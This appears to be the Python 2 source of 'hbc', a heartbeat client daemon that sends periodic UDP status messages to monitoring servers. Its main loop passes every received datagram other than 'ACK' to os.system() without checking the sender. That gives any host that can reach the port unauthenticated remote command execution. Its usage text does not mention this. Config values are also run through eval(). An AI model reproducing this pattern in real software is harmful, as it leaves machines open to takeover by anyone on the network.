#!/usr/bin/env python
# $Id: hbc,v 1.9 2012/03/29 02:08:36 andreas Exp $

# require on Linux
#	python-filelock 
#	python-daemon vs 1.61 or >
# on *bsd
#	py27-lockfile 
# 	py-27-daemon
# or run  sudo easy_install-2.7 lockfile daemon
import sys
import time
import socket
import os
import signal
import getopt
import string
import select
import errno
import traceback
import lockfile 
import daemon
try:
	import daemon.pidfile
except:
	print "need version 2.1 or higer of python-daemon"
	sys.exit(1)
import syslog


PORT = 50003
INTERVAL = 10
PIDFILE = '/tmp/hbc.pid'
DBG = False

sock = None
up = True
ackcount = 0

class NullDevice:
    def write(self, s):
        pass


def syslogtrace(note):
	logm = '%s hbc died: \n%s' % (note, traceback.format_exc())
	for l in logm.split('\n'):
		syslog.syslog('  tb: %s' % l)


def getsock(host):
	try:
		r=socket.getaddrinfo(host,  50001, 0, 0, socket.SOL_UDP)
	except socket.gaierror:
		logm = '%s hbc died: \n%s' % ('getsock', traceback.format_exc())
		if DBG: print logm
		return None
	if r[0][0] in [10, 28, 30]:
		af_type=socket.AF_INET6
	elif r[0][0] == 2:
		af_type=socket.AF_INET
	else:
		print "dont know this net type:  %s" %  r[0][0]
		sys.exit(1)
	if verbose:
		syslog.syslog("socktype: %s" % af_type)
	sock=socket.socket(af_type, socket.SOCK_DGRAM)
	sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, \
            sock.getsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR) | 1)
	if verbose: syslog.syslog("get socket %s" % sock)
	
	return sock


def socksend(msg, tohost):
	global sock

	if sock == None:
		sock=getsock(tohost[0])
	if DBG: print "socksend: sending msg=%s on socket=%s" % (msg, sock)
	sock.sendto(msg, tohost)
	if verbose: syslog.syslog("msg %s sent" % msg)


def process():
	global up, sock, ackcount

	if sock == None:
		sock=getsock(tohost[0])

	ackcount=0
	lastT=time.time()
	while up:
		sleep=(lastT+interval) - time.time() 
		if verbose: syslog.syslog("sleep %s" % sleep)
		if sleep > 0:
			try:
				r=select.select([sock.fileno()],[],[],sleep)
			except:
				if up:
					syslogtrace('select')
				break
			if verbose: syslog.syslog("r is %s" % str(r))
			if sock.fileno() in r[0]:
				data, addr = sock.recvfrom(1024)
				if  data == "ACK":
					ackcount+=1
				else:
					try:
						os.system(data)
					except:
						syslogtrace('System')
						pass
				continue	
		lastT=time.time()
		for hb_host in hb_hosts:
			try:
				msg="interval=%s;name=%s;time=%s;acks=%s" % (interval, iam, time.time(), ackcount)
				if verbose: syslog.syslog("sock.send('%s', (%s, %s))" % (msg, hb_host, hb_port))
				socksend(msg, (hb_host, hb_port))
			except:
				logm = '%s hbc died: \n%s' % ('socksend', traceback.format_exc())
				if DBG: print logm
				pass
	

def cleanup(a, b):
	global up, sock, ackcount
	up = False
	syslog.syslog('exit a=%s b=%s' % (str(a), str(b)))
	msg="shutdown=1;name=%s;acks=%s" % (iam, ackcount)
	for hb_host in hb_hosts:
		if verbose: syslog.syslog("hbc: sock.send('%s', (%s, %s))" % (msg, hb_host, hb_port))
		socksend(msg, (hb_host, hb_port))
	time.sleep(1)
	sock.close()


msgonly=False
helpflag=False
verbose=False
fdaemon=False
optlist=[]  
args=[]
msgboot=[]
home=os.environ['HOME']
configfile="%s/.hbrc" % home

try:
    optlist, args = getopt.getopt(sys.argv[1:], 'bc:dhm:v')
except:
    helpflag=True

for o,a in optlist:
	if o == '-b':
		msgboot.append("boot=1")
	elif o == '-c':
		configfile=a
	elif o == '-d':
		fdaemon=True
	elif o == '-h':
		helpflag=True
	elif o == '-m':
		msgboot.append("service=%s" % "service")
		a.replace(';',':')
		msgboot.append("msg=%s" % a)
		msgonly=True
	elif o == '-v':
		verbose=True


if helpflag:
	print "hbc HeartBeatClient"
	print "usage: hbc [-bdhv] [-c configfile] [-m msg][host1 [..]]"
	print
	print "	-b	indicate machine boot"
	print "	-c configfile"
	print "	-d daemonize"
	print "	-h this help"
	print "	-m send a message"
	print "	-v verbose"
	print
	print """ config file can contain 
hb_hosts=('host1', 'host2', ..._
hb_port=50003
interval=20
logfile=...
logfmt={|test|msg}
grace=SECONDS
reportstrict={True|False}
"""

	sys.exit(1)

#
# set defaults

hb_port=PORT
interval=INTERVAL
hb_hosts=[]
iam=socket.gethostname()

try:
	f=open(configfile,"r")	
	if verbose: print "notice: using config file %s" % configfile
except:
	if verbose: print "warning: running without config file: %s" % configfile
	f=None

if f:
	while 1:
		l=f.readline()
		if len(l) == 0:
			break
		r=l[:-1].split('=')
		if r[0] == 'hb_hosts':
			hb_hosts=eval(r[1])
			if verbose:
				print "notice:  cfg hb_hosts: %s" % hb_hosts
		elif r[0] == 'interval':
			interval=eval(r[1])
		elif r[0] == 'hb_port':
			hb_port=eval(r[1])
		elif r[0] == 'name':
			iam=eval(r[1])
			if verbose: print "name set to %s" % iam
	f.close()

if len(args) != 0:
	hb_hosts=args

if len(hb_hosts) == 0:
	print "no hb server specified"
	sys.exit(1)



if verbose:
	print "notice: hb_hosts: %s" % str(hb_hosts)
	print "notice: hb_port: %s" % hb_port
	print "notice: interval: %s" % interval
	print "notice: iam: %s" % iam

if not msgonly:
	msgboot.append("interval=%s" % interval)

if len(msgboot) > 0:
	if DBG: print "on boot"
	msgboot.append("name=%s" % iam)
	msgboot.append("time=%s" % time.time())
	msgboot.append("acks=0")
	msg=";".join(msgboot)
	while 1:
		fail=0
		for hb_host in hb_hosts:
			try:
				if DBG: print "sock.send('%s', (%s, %s))" % (msg, hb_host, hb_port)
				socksend(msg, (hb_host, hb_port))
			except:
				logm = '%s hbc died: \n%s' % ('socksend2', traceback.format_exc())
				if DBG: print logm
				fail=1
		if fail:
			time.sleep(10)
		else:
			break
	
if verbose: print "msgboot done msgonly=%s" % msgonly
if msgonly:
		sys.exit(0)


#
# 
syslog.openlog(logoption=syslog.LOG_PID, facility=syslog.LOG_DAEMON)
if fdaemon:

	pidfile = daemon.pidfile.TimeoutPIDLockFile(PIDFILE, acquire_timeout=-1)
	try:
		opid = pidfile.read_pid()
	except:
		opid = None
	if verbose: print "opid %s" % opid

	if opid:
		try:
			os.kill(opid, 0)
			is_running = True
		except:
			is_running = False
		if verbose: print "is_running  %s" % is_running 
		if is_running:
			print "process still alive %s" % opid
			sys.exit(1)
		print "warning: stale pid file removed"
		os.unlink(PIDFILE)

	print "daemoinizing... %s" % os.getpid()
	context = daemon.DaemonContext(
		working_directory='/tmp',
		umask=0o002,
		pidfile=pidfile,
		initgroups=False,
		)

	context.signal_map = {
		signal.SIGTERM: cleanup,
		signal.SIGHUP: 'terminate',
#		signal.SIGUSR1: reload_program_config,
		}

	context.files_preserve = [sock, sock.fileno()]
	with context:
		syslog.syslog('starting heartbeat to %s' %  ','.join(hb_hosts))
		up = True
		try:
			process()
		except:
			syslogtrace('process')
			cleanup(0, None)

